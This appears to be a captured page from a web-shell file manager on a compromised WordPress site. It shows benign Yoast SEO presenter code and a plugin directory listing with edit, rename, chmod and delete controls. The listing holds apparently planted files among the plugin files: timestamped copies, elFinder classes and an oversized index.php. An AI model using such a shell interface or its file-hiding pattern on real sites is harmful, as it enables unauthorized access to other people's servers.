Submit
Path:
~
/
home
/
bfxleof
/
www
/
wp-content
/
plugins
/
wordpress-seo
/
src
/
deprecated
/
src
/
presenters
/
admin
/
File Content:
image-presenter.php
<?php namespace Yoast\WP\SEO\Presenters\Open_Graph; use Yoast\WP\SEO\Presentations\Indexable_Presentation; use Yoast\WP\SEO\Presenters\Abstract_Indexable_Presenter; /** * Presenter class for the Open Graph image. */ class Image_Presenter extends Abstract_Indexable_Presenter { /** * Image tags that we output for each image. * * @var array */ protected static $image_tags = [ 'width' => 'width', 'height' => 'height', 'mime-type' => 'type', ]; /** * Returns the image for a post. * * @return string The image tag. */ public function present() { $images = $this->get(); if ( empty( $images ) ) { return ''; } $return = ''; foreach ( $images as $image_index => $image_meta ) { $image_url = $image_meta['url']; $return .= '<meta property="og:image" content="' . \esc_url( $image_url ) . '" />'; foreach ( static::$image_tags as $key => $value ) { if ( empty( $image_meta[ $key ] ) ) { continue; } $return .= \PHP_EOL . "\t" . '<meta property="og:image:' . \esc_attr( $key ) . '" content="' . $image_meta[ $key ] . '" />'; } } return $return; } /** * Gets the raw value of a presentation. * * @return array The raw value. */ public function get() { $images = []; foreach ( $this->presentation->open_graph_images as $open_graph_image ) { $images[] = $this->filter( $open_graph_image ); } return \array_filter( $images ); } /** * Run the image content through the `wpseo_opengraph_image` filter. * * @param array $image The image. * * @return array The filtered image. */ protected function filter( $image ) { /** * Filter: 'wpseo_opengraph_image' - Allow changing the Open Graph image. * * @api string - The URL of the Open Graph image. * * @param Indexable_Presentation $presentation The presentation of an indexable. */ $image_url = \trim( \apply_filters( 'wpseo_opengraph_image', $image['url'], $this->presentation ) ); if ( ! empty( $image_url ) && \is_string( $image_url ) ) { $image['url'] = $image_url; } return $image; } }
Edit
Rename
Chmod
Delete
FILE
FOLDER
Name
Size
Permission
Action
.DS_Store
10234 bytes
0644
BundleWriter-20260623161641.php
5687 bytes
0644
BundleWriter.php
5687 bytes
0644
DownloadConfController-20260706154817.php
945 bytes
0644
DownloadConfController.php
945 bytes
0644
JsonSerializable.php
577 bytes
0644
class-metabox-formatter-20260705195827.php
12602 bytes
0644
class-metabox-formatter.php
12602 bytes
0644
class-opengraph-oembed-20260623144901.php
1126 bytes
0644
class-opengraph-oembed.php
1126 bytes
0644
class-option-tabs-formatter.php
2321 bytes
0644
class-rewrite.php
7140 bytes
0644
class-sitemaps-admin-20260703023908.php
3665 bytes
0644
class-sitemaps-admin.php
3665 bytes
0644
class-taxonomy-columns-20260706012610.php
7324 bytes
0644
class-taxonomy-columns.php
7324 bytes
0644
class-wpseo-statistics-20260703220502.php
1443 bytes
0644
class-wpseo-statistics.php
1443 bytes
0644
class-yoast-plugin-conflict.php
10390 bytes
0644
class.pack.database.php
30838 bytes
0644
dashboard-1650-rtl.css
1634 bytes
0644
description-presenter-20260623011438.php
1026 bytes
0644
duplicator-20260707223259.php
1781 bytes
0644
duplicator-en_US.mo
582 bytes
0644
duplicator-main-20260623233136.php
26907 bytes
0644
duplicator-main.php
26907 bytes
0644
duplicator.php
1781 bytes
0644
elFinderPlugin.php
3331 bytes
0644
elFinderVolumeLocalFileSystem.class.php
48544 bytes
0644
environment-helper.php
596 bytes
0644
estimated-reading-time-20260703220613.php
1111 bytes
0644
exceptions.php
708 bytes
0644
image-presenter.php
2093 bytes
0644
inc.data-20260706132915.php
5121 bytes
0644
inc.data.php
5121 bytes
0644
inc.validator.php
5401 bytes
0644
index.php
157663 bytes
0644
indexation-list-item-presenter.php
982 bytes
0644
indexation-modal-presenter-20260623072105.php
767 bytes
0644
indexation-modal-presenter.php
767 bytes
0644
indexation-permalink-warning-presenter.php
982 bytes
0644
indexation-warning-presenter.php
1652 bytes
0644
link-count-indexing-list-item-presenter.php
805 bytes
0644
link-count-indexing-modal-presenter.php
785 bytes
0644
loco.xml
657 bytes
0644
quick-edit-handler-1650.js
1848 bytes
0644
title-presenter.php
1077 bytes
0644
values-helper.php
2652 bytes
0644
wordpress-seo-es_ES-20260707102352.json
25583 bytes
0644
wordpress-seo-es_ES.json
25583 bytes
0644
wordpress-seojs-ar.json
25925 bytes
0644
wordpress-seojs-bs_BA.json
13790 bytes
0644
wordpress-seojs-es_CR.json
14212 bytes
0644
wordpress-seojs-fi.json
19387 bytes
0644
wordpress-seojs-gl_ES.json
20143 bytes
0644
wordpress-seojs-it_IT.json
20244 bytes
0644
wordpress-seojs-ja.json
21424 bytes
0644
wordpress-seojs-uk.json
26506 bytes
0644
wp-query-wrapper.php
834 bytes
0644
wpseo-functions.php
11305 bytes
0644
N4ST4R_ID | Naxtarrr